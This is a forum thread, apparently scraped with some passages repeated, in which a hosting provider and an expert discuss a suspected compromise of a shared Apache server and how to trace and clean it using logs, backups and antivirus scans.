>>Â I don't think so, refer to the logs, 127.0.0.1 and 124.217.243.21 is normal when access on APACHE 2.28 webserver . It is the way apache is logged now (New Version). 100++ of my other server also having the same logs style when people accessing the websites hosted on the server.
Some random thoughts/ questions
- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.
>>Â We are providing shared hosting service in which for security wise we can alter any of our terms of services and SLA.
- what does your clients' contract say? who is responsible for their own account security?
>>Â Own account security is off course their responsibility but the overall server setup is our responsibility.
- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).
>>Â No , this is the overall apache server logs that logged everything accessed using apache 2.28.
- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
>>Â Off course no, we managed more than 5000 hosting account on few of our servers.
- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.
>>Â Yes, we have a mirror backup . daily, weekly and monthly backup on separate server.
Thanks for the advice and your comment.
Refer to your question :
- Are you the piradius.net reported in the mail?
>>Â No, piradius.net is our IP provider.
- Is the IP address 124.217.243.21 part of yours? are there specific host on this machine?
>>Â Yes, 124.217.243.21 is the main shared IP for this server.
- if this is the case, then certainly your server has been hacked. YOU NEED TO BE SURE THIS IS NOT DAMAGING YOUR CUSTOMERTS' SITES...
>>Â I don't think so, refer to the logs, 127.0.0.1 and 124.217.243.21 is normal when access on APACHE 2.28 webserver . It is the way apache is logged now (New Version). 100++ of my other server also having the same logs style when people accessing the websites hosted on the server.
Some random thoughts/ questions
- mod_security seems to be htaccess/mod rewrite based and I would think you cannot use them without your customers' consent and so should be ruled out as a general solution.
>>Â We are providing shared hosting service in which for security wise we can alter any of our terms of services and SLA.
- what does your clients' contract say? who is responsible for their own account security?
>>Â Own account security is off course their responsibility but the overall server setup is our responsibility.
- the logs should tell which site is targeted. If this does not appear, it is YOUR site, not theirs, which is under attack. (which does not mean that their logs, if scrutinized, would not exhibit similar attacks against their won site).
>>Â No , this is the overall apache server logs that logged everything accessed using apache 2.28.
- are their site hosted physically on the same machine as yours? are they in the same disk hierarchy, or are yours and theirs distinct? If this is not the case and if this is possible, you should plan for doing that at the first occasion (don't do it under pressure).
>>Â Off course no, we managed more than 5000 hosting account on few of our servers.
- I presume you are taking backup of everything, including their sites. If not, you should  until things sem fairly back to normal: it will ensure that, in case of a major problem, the diruption will be as short as possible.
>>Â Yes, we have a mirror backup . daily, weekly and monthly backup on separate server.
OK.
Everything seems fine except your own server.
Therefore, and since your clients' directories are not under your own, you can do "whatever you want" on your own web site: you can change your own script as needed etc.
The problem is then
a - your site, and probably some others as well, are under attacks from one or several hacked sites at IP address 124.217.243.21
b - one of those is most probably your own site (127.0.0.1)
c - you have found no easy way to check which of the sites is/are originating the "sniffing" of the attacks.
My thoughts:
1 - your own site needs to be cleaned, using all or some of my suggestions or equivalent.
2 - Once this is done (ie, you have found and cleaned at least one source of the scripts), check in the logs if the attacks still persist. If no, MAYBE the problem is solved for now. If yes... are there still attacks coming from 127.0.0.1? if no... MAYBE your machine is cured, and some other is not.
3 - To chase other machines: if you have the legal right to do so, look to their sites' logs file: are there other sites under attacks? from which IPs? are there any from 127.0.0.1? if yes, then probably these very sites have been hacked. But here you need to work with your client to clean their sites...
4 - The sites are running on Apache, presumably on Linux. Check the whole disks with anti-viruses. Most recent anti-virus also look for this type of trojan...
Good hunting!
Everything seems fine except your own server.
Therefore, and since your clients' directories are not under your own, you can do "whatever you want" on your own web site: you can change your own script as needed etc.
The problem is then
a - your site, and probably some others as well, are under attacks from one or several hacked sites at IP address 124.217.243.21
b - one of those is most probably your own site (127.0.0.1)
c - you have found no easy way to check which of the sites is/are originating the "sniffing" of the attacks.
My thoughts:
1 - your own site needs to be cleaned, using all or some of my suggestions or equivalent.
2 - Once this is done (ie, you have found and cleaned at least one source of the scripts), check in the logs if the attacks still persist. If no, MAYBE the problem is solved for now. If yes... are there still attacks coming from 127.0.0.1? if no... MAYBE your machine is cured, and some other is not.
3 - To chase other machines: if you have the legal right to do so, look to their sites' logs file: are there other sites under attacks? from which IPs? are there any from 127.0.0.1? if yes, then probably these very sites have been hacked. But here you need to work with your client to clean their sites...
4 - The sites are running on Apache, presumably on Linux. Check the whole disks with anti-viruses. Most recent anti-virus also look for this type of trojan...
Good hunting!
ASKER CERTIFIED SOLUTION
membership
Create a free account to see this answer
Signing up is free and takes 30 seconds. No credit card required.
Thx for the points.
ASKER
I do that on 8th June and still the attack happened..
I don't know how to check the domain/hosting involves based on the Apache Access Log.